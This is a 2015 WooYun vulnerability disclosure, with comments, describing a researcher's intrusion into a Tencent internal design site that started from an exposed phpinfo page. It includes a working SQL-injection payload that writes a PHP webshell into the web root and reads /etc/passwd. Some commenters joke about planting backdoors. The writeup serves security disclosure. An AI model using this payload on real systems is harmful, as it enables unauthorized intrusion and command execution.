当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121069

漏洞标题:从一个phpinfo到一次半途而废的腾讯内网漫游之旅

相关厂商:腾讯

漏洞作者: 举起手来

提交时间:2015-06-17 10:19

修复时间:2015-06-17 10:47

公开时间:2015-06-17 10:47

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-17: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

从一个phpinfo到一次半途而废的腾讯内网漫游之旅;哎,腾讯反应有点快啊,搞了一会,吃个饭回来;尼玛下线了。卧槽啊,分享下思路。

详细说明:

一、扫到了腾讯几个小问题,比如phpinfo之类的:

tencent2.png


tencent3.png


二、深入(一波三折)
从上面扫到的几个漏洞来看,183.61.39.187这个IP存在两个web目录:

http://183.61.39.187/brand/
http://183.61.39.187/sola/


其中这个http://183.61.39.187/brand/ 就是一哥日过的那个ycg.qq.com;当时我访问到这个,我都惊呆了,知道有戏;
然而,我选择了http://183.61.39.187/sola/这个,因为上面那个目录并没有什么卵用。
这个sola是他们内部一些搞设计的自己搭的站,访问首页直接尼玛跳到

http://passport.oa.com/modules/passport/signin.ashx?url=http://isux.oa.com/sola/


然而,根据我多年的经验,这特么是个内部用的站啊。passport.oa.com是腾讯内部统一认证登陆的接口。
好,紧接着我屏蔽这个跳转,发现首页是一个上传,兴奋。。。
结果,尼玛竟然不能传php,撸了几种上传姿势,硬是没搞定,上传接口如下:

<form action="http://isux.oa.com/sola/upload.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="files[]" id="file" /> 
<br />
<input type="submit" name="submit" value="Submit" />
</form>


但是,但是我抓到一个另外的接口

http://isux.oa.com/sola/server/showPic.php
user=


恩,很不错,存在注入漏洞。那么我来写个文件试试;web目录是我从phpinfo里看到的—_-!

http://isux.oa.com/sola/server/showPic.php
user=1' union select 1,"<?php system('ps aux')?>",load_file('/etc/passwd'),4,5,6,7,8,9,0 into outfile "/data/imgcache/htdocs/sola/public/1k23hj1k22b.php" -- ;


竟然上传成功了,惊呆了

tencent1.png


好了,饿了,回家吃饭,
结果,吃完饭回来,尼玛下线了,,,

漏洞证明:

tencent1.png

修复方案:

已经下线了。。。

版权声明:转载请注明来源 举起手来@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-06-17 10:33

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

2015-06-17:渗透行为发生时被安全系统检测到,业务已下线

漏洞评价:

评论

  1. 2015-06-17 10:33 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    速度不错

  2. 2015-06-17 10:51 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    说了多少次,千万不要phpinfo..........

  3. 2015-06-17 10:52 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    检测到就能给1分了?

  4. 2015-06-17 11:03 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    说了多少次,千万不要phpinfo.......... 关键字被检测到了

  5. 2015-06-17 11:15 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    他们有“洋葱”

  6. 2015-06-17 11:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    腾讯牛逼啊

  7. 2015-06-17 11:32 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    你好1分

  8. 2015-06-17 11:35 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    卧槽 就1分

  9. 2015-06-17 12:12 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    检测到了就给1分?2333333333

  10. 2015-06-17 12:24 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    waf认识你了,小哥。

  11. 2015-06-17 12:34 | jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:‮.kcaH eb nac gnihtynA))

    听说请求腾讯的站加上各种关键字,腾讯某些人就得忙起来,不知道这是不是真的..

  12. 2015-06-17 13:15 | wy007 ( 实习白帽子 | Rank:95 漏洞数:10 | 其实我是一名卧底...)

    又学习新姿势了...

  13. 2015-06-17 13:43 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    渗透行为发生时被安全系统检测到,业务已下线尼玛好强大!

  14. 2015-06-17 13:50 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    我比较好奇这个 oa你是怎么跳转进去的

  15. 2015-06-17 13:53 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    吃个饭回来;尼玛下线了。卧槽啊

  16. 2015-06-17 13:58 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    说了多少次,千万不要phpinfo..........

  17. 2015-06-17 13:58 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    记住了,下次搞站的时候,备好干粮,去吃啥饭嘛!!

  18. 2015-06-17 14:08 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    才一分啊,大腾讯太小气了吧,啥理由也没有就1分?大家都别去tsrc了,直接发贴分享吧!

  19. 2015-06-17 14:16 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    @PgHook 9494放个后门再去吃啊

  20. 2015-06-17 14:21 | PyNerd ( 普通白帽子 | Rank:156 漏洞数:28 | Just for shell.)

    腾讯的内网敏感,下次还是不要提交tsrc直接发出来分享吧

  21. 2015-06-17 14:23 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  22. 2015-06-17 14:36 | B1gstar ( 实习白帽子 | Rank:52 漏洞数:6 | 向各位学习来了。)

    喜欢这个节奏,速度公开

  23. 2015-06-17 14:43 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    牛逼 一提交就公开

  24. 2015-06-17 15:19 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    每次搞到**洞 还没提交 就已经检测到 然后给修复 在提交忽略的说

  25. 2015-06-17 15:34 | whitehat ( 路人 | Rank:2 漏洞数:1 | 用心,認真,努力,負責任...)

    渗透行为发生时被就被检测到了,这系统厉害啊

  26. 2015-06-17 15:43 | 哲璇 ( 普通白帽子 | Rank:168 漏洞数:31 | 低调奢华)

    速度真快

  27. 2015-06-17 15:58 | 白开水 ( 普通白帽子 | Rank:242 漏洞数:27 | 苍茫的天涯是我的爱~)

    哈哈哈哈 吃个饭下线了

  28. 2015-06-17 16:33 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    老大说了:腾讯牛逼啊

  29. 2015-06-17 17:12 | Zephyrus ( 路人 | Rank:14 漏洞数:7 | 静心学习)

    腾讯这反映略快啊

  30. 2015-06-17 18:32 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    记住了,下次搞站的时候,备好干粮,去吃啥饭嘛!!

  31. 2015-06-17 19:23 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    以后要拼手速的

  32. 2015-06-17 19:31 | JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)

    这时候你会发现一个妹纸多么重要了,当你撸站饿了的时候她主动给你送来饭,让你张嘴喂你吃,伙计,你缺的不是技术,缺的是送饭的妹纸啊!!!

  33. 2015-06-17 20:17 | 小熊饼干 ( 实习白帽子 | Rank:41 漏洞数:6 | 酱油专业户)

    用1分来说明下“安全系统”,然而这有卵用?

  34. 2015-06-17 20:48 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    洞主, 这说明不了什么,,这说明腾讯还给你挖洞的机会。。。加油看好你

  35. 2015-06-17 23:34 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    渗透行为发生时被安全系统检测到,业务已下线,还是腾讯牛逼!

  36. 2015-06-19 11:13 | 我来你网 ( 路人 | Rank:0 漏洞数:1 | 这世界人来人网我来你网)

    学习了

  37. 2015-06-21 07:23 | Ning ( 实习白帽子 | Rank:47 漏洞数:6 )

    渗透行为发生时被安全系统检测到,业务已下线

  38. 2015-06-24 08:17 | 3ang ( 路人 | Rank:2 漏洞数:1 | 风往北吹,你走的好干脆!)

    渗透行为发生时被安全系统检测到,业务已下线

  39. 2015-06-26 18:35 | ucifer ( 普通白帽子 | Rank:156 漏洞数:52 | 萌萌哒~)

    这洞不止1rank吧,虽然已经被检测到了

  40. 2015-06-29 11:14 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    @ucifer 检测到了说明这种方式的攻击是可控的,在实际环境中危害并不是很大,但1rank确实不太合理

  41. 2015-07-05 18:09 | Loser ( 路人 | Rank:4 漏洞数:1 | 蓝翔手扶拖拉机专业。)

    23333真是到爆炸啊= =可能因为是业务及时下架,所以才给1分吧

  42. 2015-07-22 21:16 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    才一分啊,大腾讯太小气了吧,啥理由也没有就1分?大家都别去tsrc了,直接发贴分享吧!

  43. 2015-08-18 13:47 | 番茄师傅 ( 普通白帽子 | Rank:254 漏洞数:59 | http://www.tomatoyu.com/)

    检测到就能给1分了?

  44. 2015-09-13 16:11 | hell0123 ( 路人 | Rank:2 漏洞数:1 | 混圈子,学姿势)

    @jeary 一有关键字就人工检测,这劳动力有点大啊...